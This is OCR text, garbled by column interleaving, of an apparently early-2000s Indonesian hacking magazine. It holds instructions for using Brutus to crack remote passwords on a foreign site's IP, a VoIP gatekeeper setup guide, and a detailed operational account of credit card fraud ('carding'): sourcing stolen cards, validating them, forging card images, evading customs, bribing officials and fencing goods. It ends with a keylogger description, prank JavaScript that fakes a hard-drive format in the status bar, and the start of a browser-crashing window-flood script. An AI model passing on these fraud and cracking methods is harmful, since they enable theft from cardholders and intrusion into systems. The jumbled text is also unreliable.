downloads and over 175,000 visitors to this page. Deve- Informasi pada Gambar 1 merupakan alamat sebuah Web
lopment continues so new releases will be available in (situs) milik negara Jepang yang saya reverse ke dalam
the near future.” Artinya, Brutus sebagai salah satu re- bentuk IP menggunakan fasilitas WHOIS. Kemudian se-
mote password cracker, adalah yang paling memungkin- telah itu, sebagai langkah berikutnya, paste alamat IP ter-
kan, proses cracking-nya sangat cepat, dan sangat fleksi- sebut ke dalam field target, lalu pilih type/jenis layanan
bel. Namun begitu, Brutus hanya bisa dioperasikan pada yang akan anda crack, seperti terlihat pada Gambar 2.
mesin-mesin yang menjalankan sistem operasi Microsoft Sebelum anda mengklik tombol Start, pastikan sekali lagi
Windows 95/98/ME/2000/XP, atau NT. bahwa anda sudah memeriksa semua opsi yang berkenaan
Adapun fitur atau jenis-jenis account layanan yang bisa dengan service yang akan di-crack tersebut. Dan setelah
di crack Brutus, antara lain adalah sebagai berikut: semuanya OK, segera klik tombol Start untuk memulai
proses cracking.
VoI P Merdeka
TOnno W. Purbo (onno@indo.net.id) mengungkapkan keprihatinannya dengan membentuk jaringan VoIP
untuk rakyat. Pemakai biasa cukup menggunakan Netmeeting yang sudah standar pada Windows dan
registrasi ke gatekeeper yang disediakan oleh APJII.
Panduan ini diberikan untuk beberapa skenario: sebetulnya kalau di ijinkan jaringan VoIP Merdeka dapat
1. End user dengan PC yang ada sambungan ke Internet saja tersambung ke jaringan milik Telkom, Indosat
(IP Public) tanpa proxy server, biasanya dial-up user maupun operator telekomunikasi lain.
atau pengguna rumahan. Bagi operator gateway VoIP dan gatekeeper yang cukup
2. End user dengan PC yang tersambung ke Internet me- pandai sebetulnya dapat dengan mudah mengintegrasikan
lalui proxy server di Warnet, perkantoran atau sekolah. jaringan VoIP Merdeka ke jaringan milik Telkom dsb.
3. Operator proxy server, seperti Warnet, kantor dll. Tentunya harus dilakukan dengan hati-hati supaya anda
tidak terkena sangsi penjara. Maklumlah pemerintah di
4. Operator gatekeeper di Internet. Indonesia ‘kan tidak terlalu berpihak pada rakyat.
5. End user yang menggunakan peralatan gateway VoIP.
Jika termasuk kategori ini, anda cukup beruntung karena End user dengan PC yang ada sambungan ke
memungkinkan anda untuk membangun RT/ RW-net Internet (IP Public) tanpa proxy server
VoIP untuk membypass SLJJ dan SLI yang mahal itu. Peralatan yang dibutuhkan sangat sederhana
Usulan penggunaan nomor telepon di 1. PC yang tersambung langsung ke Internet; dial-up pun OK.
jaringan VoIP Merdeka 2. sound card + mikrofon + headphone (sebaiknya meng-
gunakan handphone supaya suara tidak feedback ke
Agar jaringan VoIP Merdeka dapat beroperasi dengan mikrofon).
lancar perlu kesepakatan alokasi nomor telepon yang
akan digunakan. Saya usulkan menggunakan format: 3. software NetMeeting 3.01, biasanya sudah tersedia di
Windows 98 ke atas. Jika belum ada, dapat di download
0111 aaa ttttt xx gratis di www.microsoft.com/netmeeting. Bagi anda
misalnya yang menggunakan Linux, dapat menggunakan
0111 021 12345 xx GnomeMeeting.
di mana Setup software untuk VoIP, untuk pengguna Windows
0111 = call area untuk VoIP Merdeka dan NetMeeting 3.01:
021 = jika anda berada di Jakarta (3 digit), Bogor 251, Tools → Options → General → Advanced Calling
Bandung 022 dll. → Use a gatekeeper to place a call (isikan IP gatekeeper
12345 = 5 digit pertama nomor telkom di daerah anda di IIX)
xx = silakan mengarang sendiri, isi 01, 02, 03, 04, 05,
06, 07 dst. → log on using my phone number (isikan nomor
telepon sesuai konsensus di atas)
Perhatikan bagian aaa, kita mengambil tiga digit dari area
code milik Telkom untuk mengidentifikasi dari daerah ma- IP gatekeeper di IIX adalah 202.148.63.18 Gatekeeper ter-
na lokasi pesawat telepon VoIP anda. Perhatikan untuk sebut milik APJII (Asosiasi Penyelenggara Jasa Internet
pengguna yang mempunyai area code 2 digit, seperti Jakar- Indonesia) yang terletak di Indonesia Internet Exchange
ta 21, Bandung 22, maka bagian aaa diisi 021, atau 022 di- (IIX). Dengan meregistrasikan diri ke gatekeeper milik
beri angka nol di awalnya. Sedang bagi anda yang mem- APJII ini, anda dapat berkomunikasi dengan rekan-rekan
punya area code tiga digit seperti Bogor 251, maka tidak lain yang terkait di jaringan VoIP Merdeka. Silakan
perlu memberi angka nol. Penomoran ini dalam jaringan memonitor/menanyakannya di mailing list genetika@
VoIP Merdeka dikenal menggunakan format E.164. yahoogroups.com untuk keterangan lebih lanjut tentang
gatekeeper untuk keperluan publik ini.
Sebetulnya kurang tepat menggunakan hanya call area
0111. Secara internasional harusnya menggunakan 62 111 Pada saat anda dial ke Internet, secara otomatis NetMeeting
bukan 0 111. Jika nanti dibutuhkan untuk interkoneksi se- akan mencari gatekeeper untuk meregistrasikan PC (no-
cara nasional/internasional bisa dilakukan proses rewrite mor telepon anda). Jika NetMeeting berhasil teregistrasi,
nomor E.164 di gatekeeper pada bagian [RasSvr::RewriteE164], pada pojok kanan bawah console NetMeeting akan ada
jadi tidak masalah menggunakan nomor 0111. gambar 2 buah komputer yang saling tersambung dengan
warna yang jelas, sebelumnya warnanya tidak jelas.
Gatekeeper yang di operasikan di jaringan VoIP Merdeka
sebetulnya secara teknis dapat mengenali nomor-nomor Setelah NetMeeting terregistrasi ke gatekeeper, anda bisa
milik Telkom maupun operator telekomunikasi lain, misal menelpon ke rekan lain yang menggunakan jaringan
021 1234567, atau 0811 123456 dsb. Oleh karena itu VoIP Merdeka dan menggunakan nomor 0111 xxx
xxxxxxxx.
yang tersambung ke Internet melalui proxy. Biasanya PC maka bisa diletakan di folder yang sama dengan gnugk.exe
demikian akan digunakan di Warnet, LAN perkantoran, misalnya D:\temp\openh323gk\bin\, misal dengan nama
LAN sekolah atau kampus. warnetvoip.ini.
Sebetulnya, secara prinsip tidak berbeda dengan end user Selanjutnya gatekeeper harus dijalankan secara otomatis
yang mempunyai sambungan langsung ke Internet. Beda- ke dalam bagian StartUp agar setiap kali Windows dija-
nya anda harus registrasi ke gatekeeper yang berada di lankan gatekeeper akan langsung beroperasi. Pada Windows
mesin proxy/wingate/winroute anda; jangan meregistrasi 98, dapat dilakukan melalui:
ke gatekeeper publik 202.148.63.18 yang dioperasikan di IIX Start → Settings → Task bar dan Start Menu .. → Start
atas dukungan APJII. Anda tidak mungkin registrasi dan Menu Programs → Add ..
mengoperasikan VoIP tanpa bantuan gatekeeper di proxy
server karena port VoIP tidak bisa menembus proxy. Isikan pada command line perintah berikut (mohon dise-
suaikan dengan path dari perintah sebetulnya):
Hal ini akan menjadi masalah bagi sebagian besar pengguna
Internet di Indonesia karena umumnya berada di belakang D:\temp\openh323gk\bin\gnugk -c d:\temp\openh323gk\bin\warnetvoip.ini
proxy. Anda disarankan meminta kepada operator proxy Masukkan program yang anda buat ke Start Menu supa-
server tersebut untuk mengoperasikan gatekeeper di ya pada saat kita login ke Windows, program tersebut
proxy server-nya. dijalankan oleh Windows. Hanya masalahnya dengan
Start Menu program baru akan jalan sesudah kita login
Teknik instalasi software gatekeeper ke Windows, mungkin ada baiknya di coba untuk di
Software yang digunakan adalah Open H.323 gatekeeper. masukan ke autoexec.bat supaya setiap kali mesin di start
Software tersebut dapat di ambil di www.sourceforge.net gatekeeper langsung di operasikan.
atau www.sf.net dengan menggunakan keyword openh323 Tentunya sebelum anda memasukan perintah tersebut ke
gatekeeper. Atau langsung dari www.gnugk.org. Open Start Menu Programs ada baiknya di check dulu di MSDOS
H.323 gatekeeper tersedia dalam beberapa versi Linux prompt apakah sudah berhasil dengan baik atau belum.
maupun Windows.
Pada saat proses debugging sebaiknya menjalankan gnugk
Perlu dicatat bahwa software gatekeeper yang digunakan dari MSDOS prompt langsung di D:\temp\openh323gk\bin\
adalah open source sehingga dapat digunakan secara dengan mengaktifkan trace sbb:
cuma-cuma tanpa melanggar hak cipta sama sekali.
gnugk -ttt -c warnetvoip.ini
Beberapa versi yang berhasil saya jalankan dengan baik,
Kita bisa melihat trace message untuk proses debugging
• gk-2.0a-linux-bin.tgz berjalan dengan baik di Linux kerja dari gatekeeper.
Mandrake 8.0.
• gk-2.0.2-linux-bin.tgz berjalan dengan baik di Linux Bagi anda pengguna Linux, langkah instalasi di Linux sedi-
Mandrake 9.0 kit lebih rumit daripada di Windows. Saya menggunakan
• gk-2.0.2-windows-bin.zip berjalan dengan baik di Linux Mandrake yang mudah dioperasikan, saya tidak
Windows 98 (dan kemungkinan di versi Windows yang dapat memberikan komentar terlalu banyak untuk peng-
lebih tinggi). guna Linux selain Mandrake karena belum mencoba di
distro lain. Adapun caranya adalah sbb:
Bila anda melihat di www.gnugk.org ada versi develop-
ment 2.1-nya. Silakan coba gunakan dan tanggung 1. masuk sebagai root
risikonya sendiri hehehehe …. 2. copykan gk-2.0a-linux-bin.tgz ke /usr/local/src
3. pindah ke /usr/local/src
Bagi pengguna Windows, anda dapat mengoperasikan 4. tar zxvf gk-2.0a-linux-bin.tgz
gatekeeper tersebut di mesin Windows dan juga dapat di 5. cd openh323gk
operasikan berdampingan dengan software proxy yang 6. cd bin
ada seperti Wingate atau Winroute. Sayangnya Windows 7. cp gnugk /usr/bin
rentan sekali dengan virus dan tidak seandal Linux untuk 8. cp lib* /usr/lib
dioperasikan sebagai server. 9. atau cp lib* /lib
Langkah instalasi di Windows sebetulnya lebih mudah 10. contoh file konfigurasi adalah di folder
daripada di Linux: /usr/local/src/openh323gk/etc.
1. copykan gk-2.0.2-windows-bin.zip ke salah satu direk- Anda yang menggunakan Linux Mandrake 9.0 dapat meng-
tori, misal D:\temp. gunakan openh323 gatekeeper versi 2.0.2 tanpa masalah
2. ekstrak gk-2.0.2-windows-bin.zip menggunakan Winzip. berarti. Agak berbeda dengan versi 2.0a, pada versi 2.0.2
3. akan terlihat folder D:\temp\openh323gk\ tidak ada file lib*, anda cukup menginstal openh323 di Li-
4. File gnugk.exe terdapat di folder D:\temp\openh323gk\ nux Mandrake 9.0 untuk menggantikan lib* yang dibu-
bin\ tuhkan. Sisa proses instalasi tidak berbeda dengan versi 2.0a.
5. File-file contoh konfigurasi ada di folder Pada titik ini anda bisa menjalankan gnugk dengan cara
D:\temp\openh323gk\etc\ mengetikan
Pada titik ini anda dapat masuk ke D:\temp\openh323gk\ gnugk -h
bin\ dan menjalankan gnugk dengan mengetikkan
untuk melihat semua perintah command line yang didukung.
gnugk -h
Bagian yang akan membuat kepala pusing adalah menset
untuk melihat semua perintah command line yang didukung. parameter dari file konfigurasi yang akan saya terangkan
Bagian yang akan membuat kepala pusing adalah menset dibawah. Jika telah selesai menset konfigurasi file-nya
parameter dari file konfigurasi yang akan saya terangkan maka bisa diletakan di /etc, misalnya dengan nama
dibawah. Jika telah selesai menset konfigurasi file-nya warnetvoip.ini. Selanjutnya gatekeeper dapat dijalankan
benar agar jaringan dapat beroperasi dengan baik. Mohon biasa; hanya dapat dihubungkan ke PABX/PBX maupun
para operator gatekeeper untuk dapat berkoodinasi dengan langsung ke saluran telkom melalui konektor RJ-11.
saya di Internet melalui onno@indo.net.id untuk mengkoor- Ada beberapa vendor yang memproduksi peralatan gate-
dinasikan proses sharing informasi antar gatekeeper ini. way VoIP ini, salah satu yang kebetulan saya familiar ada-
Untuk mengantisipasi sambungan Internasional dari jaring- lah dari Planet (www.planet.com.tw) yang di distribusikan
an VoIP Merdeka ke jaringan telepon internasional, ada oleh Corexindo di Mangga Dua.
baiknya semua gatekeeper di jaringan VoIP Merdeka me- Operasi gateway VoIP tidak terlalu sulit karena setting
rewrite nomor prefiks 62111 menjadi 0111 dalam parameternya dapat dilakukan melalui Web maupun tel-
perintah net dengan menggunakan text mode. Logika berfikirnya
[RasSvr::RewriteE164] tidak berbeda jauh dengan setting gatekeeper di atas.
62111=0111 Sebagai contoh untuk Internet Telephony Gateway (ITG)
dari Planet menggunakan text mode dapat diset agar:
# Entry agar dapat menjadi bagian jaringan Gatekeeper VoIP Merdeka
# set h323 gk_mode manual
# Anda harus mengganti GatekeeperID dengan ID yang anda inginkan set h323 gk_addr 202.111.222.123
# misalnya APJIIGK, KantorGK, RTRWNetGK, GK1, GK2, dll … set h323 endpoint_prefix 011125212345
# dua entry di bawah harus di share dengan rekan lain di
# jaringan gatekeeper set h323 term_id ITG_percobaan
# set h323 gk_id GatekeeperIDAnda
# [RasSvr::Neighbors]
# GatekeeperID=202.111.222.161:1719;011102212345 Tentunya parameter H323 di atas hanya khayalan, anda
# harus menyesuaikan dengan kondisi sebenarnya dari
# [EndPoint] jaringan VoIP yang ada.
# Prefix=011102212345
#
[Gatekeeper::Main]
Fourtytwo=42
Name=GatekeeperGK
# Prefix=011102212345
TimeToLive=600
[RoutedMode]
GKRouted=1
H245Routed=0
CallSignalPort=1721
CallSignalHandlerNumber=2
RemoveH245AddressOnTunneling=1
DropCallsByReleaseComplete=1
SupportNATedEndpoints=1
Q931PortRange=30000-39999
H245PortRange=40000-49999
[RasSvr::Neighbors]
APJIIGK=111.222.333.444;*
GK1=202.159.123.162:1719;011122450
GK2=202.123.111.222:1719;011121250
GK3=202.154.222.111:1719;0111251678
GK4=167.205.123.111:1719;* Bagi anda yang agak alergi menggunakan text mode, da-
pat juga menset-nya dengan menggunakan Web. Pada
[EndPoint]
Prefix=011102212345 VoIP gateway Planet fasilitas setting melalui Web juga di
sediakan. Tampak pada gambar adalah bagian setting gate-
[RasSvr::RewriteE164]
62111=0111
keeper di VoIP gateway Planet. Tapi dari pengalaman saya
pribadi, menset menggunakan text jauh lebih memung-
[GkStatus::Auth]
rule=allow
kinkan kita untuk menset berbagai parameter dibanding-
kan melalui Web.
End user yang menggunakan peralatan gateway VoIP Masih banyak lagi fasilitas yang dapat di set dengan
menggunakan sebuah ITG, beberapa parameter di atas
Gateway VoIP adalah peralatan yang dapat menghubung-
cukup untuk meregistrasi ITG anda ke sebuah gatekeeper
kan VoIP di Internet dengan jaringan telepon yang meng-
untuk di kenali nomor-nya. Tentunya di pihak gatekeeper
gunakan sambungan RJ-11. Biasanya peralatan gateway
dapat juga meregistrasikan secara manual sebagai
VoIP ini di sambungkan ke PBX/PABX di kantor atau di
permanent endpoint jika diinginkan.
wartel agar telepon biasa yang ada dapat terkait ke jaring-
an VoIP juga. Teknik yang lumayan membuat pusing kepala adalah
menyambungkan Internet Telephony Gateway (ITG)
Operasi VoIP yang akan sangat menantang dan dapat ber-
melalui port FXO ke peralatan PABX supaya telepon dari
benturan dengan pemerintah terutama jika anda menggu-
Internet, baik dari NetMeeting maupun dari ITG lain
nakan peralatan VoIP gateway dan menyambungkannya
dapat terhubung ke telepon biasa.
ke jaringan Public Switch Telephone Network (PSTN)
milik Telkom melalui peralatan PABX. (Private Automat- Jika anda cukup jeli teknik ini dapat dikembangkan agar
ed Branch Exchange). Biasanya peralatan VoIP gateway nomor telepon Telkom, seperti 022 2504567, di tempat
memiliki dua jenis port, yaitu: anda dapat dikenali di jaringan VoIP Merdeka dan dapat
ditelepon langsung melalui jaringan VoIP Merdeka tanpa
• FXS—yang digunakan untuk dihubungkan langsung ke
perlu melalui Telkom sama sekali.
pesawat telepon biasa melalui konektor RJ-11.
• FXO—yang tidak dapat dihubungkan ke pesawat telepon
E-COMMERCE SECURITY
Modus Operandi Carding
Lahirnya e-commerce melahirkan pula teknik-teknik yang merupakan risiko terhadap bisnis e-commerce. Selain
rawan terhadap pencurian database, situs e-commerce juga rawan terhadap credit card fraud yang lebih
dikenal sebagai carding. Seluk beluk carding bukan teknologi semata-mata, melainkan juga social engineering.
litas mewah yang disediakan di Internet, untuk itu kartu tubies, kondom, viagra, alat bantu sex, majalah porno.
kredit curian digunakan untuk mendapatkan account Pertimbangan khusus untuk memilih barang adalah:
khusus pada situs judi, porno. Privelege untuk dapat me-
masuki koneksi sebuah server dan simulator. Tidak tertu- • Mudah dikeluarkan oleh pabean, secara fisik tidak
tup juga nomor kartu kredit tersebut digunakan untuk mencolok dan mencurigakan.
membeli lisensi software atau UNIX Shell. Sementara itu • Pajak tidak tinggi, terkait dengan pembayaran yang nan-
bisnis penjualan domain dan pemanfaatan hosting yang tinya dibayarkan oleh pemesan. Untuk itu perlu penge-
membutuhkan pembayaran kartu kredit, menjadi lahan tahuan tentang perpajakan dan biasanya hal ini diterang-
yang menjanjikan untuk meraup rezeki, meski ada juga kan oleh pihak shipment atau bea cukai.
yang digunakan untuk kepentingan domain sendiri.
• Target situs belanja. Alat bantu pertama yang diguna-
Cara kerja kan adalah search engine, bisa Google, Altavista, Buyer
Sendiri, tipe single figthter biasanya merupakan pemula
Index dan lainnya. Cukup ketikkan kata kunci jenis ba-
atau mereka yang memang sudah ahli sehingga tidak rang yang diinginkan, maka akan keluar ratusan bahkan
memerlukan bantuan. ribuan situs. Tinggal dipilah-pilah mana yang cocok dan
yang tidak.
Berkelompok, kumpulan carder yang bekerja sama dalam
satu komunitas tertentu. Kelompok ini bisa secara fisik Otentifikasi
berdekatan bisa pula secara virtual, secara fisik berjauhan. Kartu kredit. Kartu kredit yang diperoleh meskipun fresh
Kelebihan mereka yang berkumpul adalah selalu terse- belum tentu siap pakai. Untuk itu carder profesional perlu
dianya informasi nomor kartu kredit baru, situs baru, melakukan otentifkasi bertingkat dengan cara:
teknik-teknik pengamanan, dan lain sebagainya. Di sini
dimungkinkan adanya pembagian tugas, semisal pencari 1. Melakukan generate pada software generator, dan akan
kartu kredit baru, situs baru, pengorder barang, negosia- ditemukan informasi
tor, penjual, bahkan translator bagi yang tidak paham • Card issue -bank yang mengeluarkan
bahasa tertentu. Kelompok ini sangat solid, bahkan sam- • Area alamat pemegang kartu kredit yang diidentifikasi
pai pada pembagian hasil, bila ada yang nyeleweng tak dengan kombinasi nomor kartu kredit yang mengarah
segan mereka secara kejam “menyiksa” si pelaku, baik pada kode pos. Dari sini bisa dibuat nama, alamat, nomor
secara fisik maupun mental. telepon pemilik kartu secara fiktif oleh software.
Metode Pencarian • Nomor kartu kredit lain yang se card issue, yang bisa
dijadikan alternatif bila nomor kartu ini ditolak.
Lokasi akses yang paling strategis adalah warnet, dengan
alasan klasik sulit dilacak. Ada pula pertimbangan lain, 2. Validasi kartu kredit, biasanya secara online pada situs
misal pemilik dan operator mau diajak kerja sama—syu- porno, judi, underground. Yang lebih profesional me-
kur kalau mau tempatnya dijadikan alamat tujuan pengi- manfaatkan situs pengembangan software security yang
riman—pengamanan komputer dan bandwidth warnet membutuhkan donasi, kalau yang satu ini validasinya
yang tidak ketat. bisa 100%, cukup sumbang $2 saja.
Situs target. Faktor penentu keberhasilan belanja dimulai
Kartu kredit yang memenuhi kriteria disini, beberapa pertimbangan carder untuk memilih situs
• Milik orang asing. Haram dan bodoh hukumnya mema- belanja yang nyaman adalah:
kai kartu kredit dari Indonesia, kecuali kalau mau untuk
ditukarkan dengan nomor asing. • Mau mengirim ke luar negeri, terutama Asia, syukur
ada option Indonesia.
• Masa berlaku masih lama agar dana yang tersedia ma-
sih banyak dan tidak mendekati limit • Pembayaran online yang realtime, dengan otentifikasi
seadanya tanpa perlu mengirim balik foto copy kartu
• Bank yang mengeluarkan minimal pernah didengar na- kredit yang dipergunakan.
manya karena ada juga merchant yang tidak mau mene-
rima kartu dari bank tertentu. • Bukan merupakan afiliasi dari usaha serupa di
Indonesia.
• Prioritas untuk mendapatkan kartu VISA, baru Master-
card, Amex, Diner dan lain sebagainya. • Pilihan metode shipment (pengiriman) yang banyak,
dan tidak terikat.
Ada beberapa cara yang dilakukan untuk memperoleh
kartu kredit Mengatasi pengamanan ekstra dan metode
• Mendapat setoran nomor kartu kredit [fresh !] dari pembayaran lain
orang yang bekerja di hotel, cafe, restoran, travel agent Mengakali alamat
dan tempat yang banyak dikunjungi orang asing.
Bukan rahasia lagi kalau tujuan pengiriman Indonesia
• Bertukar di room chat IRC kini sulit dilakukan. Biasanya pemesanan menuliskan
• Menjebol situs belanja dengan dengan skrip tertentu, tujuannya negara lain tapi dengan tetap mempergunakan
berkolusi dengan webmaster yang sakit hati, atau mencari kode pos Indonesia. Metode ini manjur karena shipment
kelemahanannya yang lain. melakukan verifikasi dengan melalui kode pos yang
sudah pasti keunikan nomornya, apalagi bila database
Target barang yang dibelanjakan alamat kota dan jalannya terdapat di kode pos tersebut.
Biasanya barang-barang tersebut tidak ada di Indonesia, Ada beberapa metode pengamanan ekstra pada situs ter-
atau sulit didapat, mahal, perlengkapan khusus (otomotif, tentu. Di antaranya adalah keharusan untuk mengirim-
olah raga, hobbies, buku, software, kebutuhan medis). Ada kan foto copy kartu kredit bolak balik beserta tanda ta-
sebagian kecil yang iseng memesan coklat, boneka Tele- ngan dan social security number (KTPnya orang Ame-
rika). Para carder yang sudah kebelet biasanya melakukan • Ambil di kantor shipment agent, cara paling nekat
olah image lewat sofware pengolah image (macam Photo- adalah menjemput bola. Resiko tertangkap sangat besar
shop). Tinggal capture atau scan kartu kredit asli lalu bila tidak memiliki "orang dalam".
kotak-katik, print, image siap untuk dikirim melaui fax
atau emai, bergantung permintaan. Penjualan
Metode pembayaran lainnya adalah dengan penggunaan Antar teman offline. Umum dilakukan untuk menutup
e-wallet, paypall, check, moneygram. Biasanya carder pe- terjadinya penipuan, atau malah paling apes jebakan yang
mula malas melakukan metode pembayaran ini, karena berakhir penangkapan dari aparat.
ruwet dan berbelit. Tapi bila ini berhasil, transaksinya bisa Antar teman online. Biasanya shipment dibelokkan lang-
mencapai puluhan ribu dolar. Caranya dengan mendaftar sung oleh pemesan ke yang bersangkutan. Kompensasi
pada situs yang menyediakan layanan tersebut, setelah bisa uang, barang lain, atau jasa (mis; pembuatan situs,
sebelumnya menyediakan sejumlah nomor kartu kredit account, image kartu kredit palsu, “pelacuran,” dan lain
yang valid 100%, nomor social security, rekening bank. sebagainya) bergantung lokasi teman online.
Teknik order Masuk counter barang yang spesifik, misal sebuah laptop
dijual ke main dealer dengan harga non garansi.
Web based, merupakan hal umum yang dilakukan dan
tidak terlalu sulit. Akibat pada bangsa
E-Mail order, dimanfaatkan bagi situs yang tidak menye- Kenakalan internet yang mengarah pada kriminal ini
diakan transaksi web -web hanya sebagai galeri, atau membuahkan hasil, yang tidak terpikirkan akibatnya
tidak memberi pilihan untuk pengiriman keluar negeri, ke oleh para pelaku, yaitu;
Asia, apalagi Indonesia. Untuk itu kemampuan berbahasa
• IP address Indonesia diblokir untuk transaksi dan
asing terutama Inggris amat diperlukan disini, apalagi bila
memasuki situs tertentu.
terpaksa harus bernegosiasi untuk meyakinkan merchant.
• Kartu kredit dari Indonesia diblokir.
Fax order, secara prisip hampir sama dengan mail order, • Integritas pebisnis Indonesia turun.
hanya saja biasanya merchant tidak menerima internet
Secara langsung saat ini mungkin pelaku tidak merasakan
fax, untuk melacak alamat nomor tujuan. Untuk meng-
dampaknya. Namun pada masa mendatang bangsa yang
atasi ini, carder bekerja sama dengan pihak wartel. Jenis
sudah terpuruk ini semakin terpuruk lagi akibat ulah
belanjaan pada metode ini umumnya grosir, dan transaksi
segelintir oknum pengguna Internet. Apa jadinya jika
yang terjadi juga besar, bisa mencapai puluhan ribu dollar.
Indonesia tidak ada lagi koneksi Internet. Jelas tidak
mungkin kita hanya saling berhubungan internet hanya
Konfirmasi melalui jalur IIX, dan tidak mendapat koneksi global.
Wajib hukumnya untuk melakukan konfirmasi setelah Hanya kesadaran moral saja yang dapat menghentikan-
belanja, bahkan pada saat belanja betulan. Hal ini berguna nya, karena lemahnya perangkat dan aparat hukum.
untuk memberikan instruksi
Removal tag. Mencopot semua label yang terkait dengan
harga agar pihak bea cukai kesulitan memberikan
estimasi pajak yang berdasarkan harga barang, sehingga
biaya pajak bisa dinegosiasikan atau syukur malah kalau
ditiadakan. Bisa juga barang tersebut diakui sebagai
barang bekas, hadiah, pengiriman kembali karena
komplain.
Pengepakan. Siasat ini juga untuk mengelabui bea cukai
dan shipment, agar pajak dan asuransinya menjadi lebih
murah. Misalnya adalah mengepak perhiasan dalam
boneka atau membungkusnya bersama buku bekas.
Permintaan track number, dapat untuk mengetahui
• Jalur perjalanan barang. Menariknya di sini sering ter-
jadi saling bajak antar carder. Jadi ada carder lain yang
mengklaim barang tersebut dan memindahkan alamat
pengiriman.
• Oknum yang bisa disuap; bea cukai, pegawai pos,
pegawai shipment, polisi
Penerimaan barang
• Diantar ke alamat pemesan, sama seperti barang
kiriman umumnya, hanya saja biasanya dilakukan secara
sembunyi-sembunyi atau diluar jam kerja karena
penerima takut bila ternyata kurir pengirim dibuntuti
aparat.
• Ambil di tempat tertentu, setelah mengadakan • BlackApril “mengungkapkan” identitasnya sebagai carder lewat situs
perjanjian sebelumnya dengan kurir, ditentukan tempat Web-nya (www.geocities.com/yogyacarding/blackapril.htm). Anda
tertentu yang biasanya ramai atau malahan sulit berniat menjadi carder? Silakan mengikuti kursus kilat melalui situs
diketahui. Yogyacarding ini.
E-COMMERCE SECURITY
etelah anda banyak mendengar
S tentang carding, mungkin timbul
pertanyaan, bagaimana cara orang
mendapatkan akses kartu kredit tersebut.
Mengungkap field tersembunyi yang berisikan informasi transaksi, termasuk nomor credit card!
pembaca untuk waspada, terlebih lagi sebuah file log yang terenkripsi. Nanti-
bila melakukan hal yang berkaitan nya file log tersebut dapat dilihat dan
dengan keamanan data pribadi anda bahkan dapat dikirimkan ke alamat
pada komputer yang dipakai oleh email tertentu atau ke komputer lain
orang banyak. Anda tentu tidak ingin dalam suatu jaringan.
data password, kartu kredit, atau data
personal lain diketahui orang. Laku-
kan hal tersebut pada komputer
pribadi saja.
Program PC Acme Net ini mencakup
fitur yang cukup lengkap. Program ini
akan bekerja di belakang layar untuk
memonitor ketukan pada keyboard,
operasi file, alamat-alamat situs yang • Keylogger PC Acme Net bekerja di
dikunjungi user, dll. Data-data yang belakang layar, memantau semua aktivitas
terkumpul itu akan terekam dalam yang berkaitan dengan pengoperasian
sebuah komputer.
KONTRA SPIONASE
eylogger merupakan pro-
K gram mata-mata yang
bekerja secara tersembu-
nyi. Tidak tampak pada tampilan
KEYLOGG E R DE NGAN kotak dialog Close Program atau
End Task. File log-nya juga ter-
sembunyi dan terenkripsi sehing-
function Seconds(data) {
homepage menjadi dinamis. Hampir seluruh halaman Web for(var i=0;i<data.length;i++)
if(data.substring(i,i+1)==":")
yang kita jumpai menggunakan JavaScript. break;
Bagi programmer yang memahami dan menguasai Java- return(data.substring(i+1,data.length));
}
Script dengan baik, membuat JavaScript makin menarik function Down() {
untuk disimak. Fake JavaScript contohnya. Dari namanya cmin2=1*Minutes(document.sw.disp1.value);
sedikit berbau Hack. Hanya baunya saja tetapi demikian csec2=0+Seconds(document.sw.disp2.value);
ditujukan untuk hack. Fake JavaScript lebih menjurus ke- DownRepeat();
pada humor, dimana user dibuat cemas terhadap apa yang }
function DownRepeat() {
terjadi pada komputernya jika halaman Web atau home- csec2--;
page yang dibuka ternyata menggunakan Fake JavaScript. if(csec2==-1) {
csec2=59; cmin2--;
Artikel ini merupakan pengalaman penulis ketika mem- }
buka sebuah halaman Web di mana ada pemberitahuan window.setTimeout('fakeformat(-1)',200);
jika sedang terjadi proses format hard disk di komputer }
lokal, status bar browser menunjukkan aktivitas tersebut function D() {
cmin2=1*Minutes(document.sw.disp1.value);
seakan-akan benar-benar terjadi. Setelah penulis mencari csec2=0+Seconds(document.sw.disp2.value);
tahu hal tersebut, ternyata sesungguhnya proses format DRepeat();
tersebut tidak terjadi. Itu hanya sebuah lelucon. }
function DRepeat() {
Mungkin lelucon tersebut mengajak kita untuk sedikit csec2--;
bersantai agar kita jangan terlalu larut dalam keseriusan if(csec2==-1) {
tinggi saat berselancar di dunia maya. csec2=59; cmin2--;
}
Di sini tidak dibahas bagaimana membuat Fake JavaScript, self.status="Document: Done";
tetapi mengulas JavaScript yang seakan-akan dapat mem- }
function faketake(percent1){
format hard disk. Setelah mempelajari artikel ini, anda if(percent1 < 100){
dapat menggunakannya untuk “menggoda” peselancar percent1++;
yang mengakses halaman Web anda. window.status="Upload of drive C:\\ in progress: "+percent1+"%
complete";
Untuk menggunakan JavaScript yang dikatakan di atas, fid1=window.setTimeout("faketake("+percent1+")",200);
yang pertama perlu dilakukan adalah membuat skripnya. }else{
Pada artikel ini, disertakan kode Fake JavaScript yang telah window.status="Upload of hard drive complete.. Now
dikatakan di atas. Mari kita gunakan halaman Web anda. deleting...";Down();}}
function fakeformat(percent){
Buatlah terlebih dahulu halaman Web dengan menggu- if(percent < 100){
nakan HTML. Anda dapat menggunakan Notepad yang percent++;
window.status="Format of drive C:\\ in progress: "+percent+"%
merupakan software yang built-in di Windows sebagai complete";
editor untuk membuatnya. Yang terpenting komputer fid=window.setTimeout("fakeformat("+percent+")",360); // 900
kita anda mendukung JavaScript atau browser yang anda }else{
gunakan adalah Microsoft IE 4.0 ke atas. window.status="Format of hard drive complete...";D();}}
window.setTimeout('faketake(-1)',200);
function go()
{
var yo=this.location;
window.open(yo);
}
// -->
</script>
Fake Crash
ada pembahasan sebelumnya telah dikemukakan
P mengenai Fake JavaScript yang seakan-akan
benar-benar memformat hardisk. Artikel kedua
Selanjutnya masukkan skrip di bawah ini pada tag <body> ini membahas mengenai Fake JavaScript yang lain yaitu
<form name='sw'>
Crash Browser.
<input type="hidden" name="disp1" value="0:05"> Crash Browser, maksudnya adalah memunculkan browser
<input type="hidden" name="disp2" value="0:05"> yang tanpa diaba-aba muncul begitu saja dengan jumlah
</form>
yang banyak ketika kita meng-upload halaman Web ter-
sebut. Dalam waktu yang tidak lama, kita melihat begitu
banyak browser yang muncul tanpa bisa dihentikan yang
mungkin saja dapat membuat komputer kita menjadi crash.
Bagaimana kita memindahkan skrip tersebut ke dalam
halaman Web kita? Pertama kita harus membuat lebih
dahulu skripnya.
<script laguage="javascript">
window.open('http://www.wadah-online.com=10000');
window.open('http://www.odyxboy.i-p.com=10000');
window.open('http://www.wadah-online.com=10000&item=3');
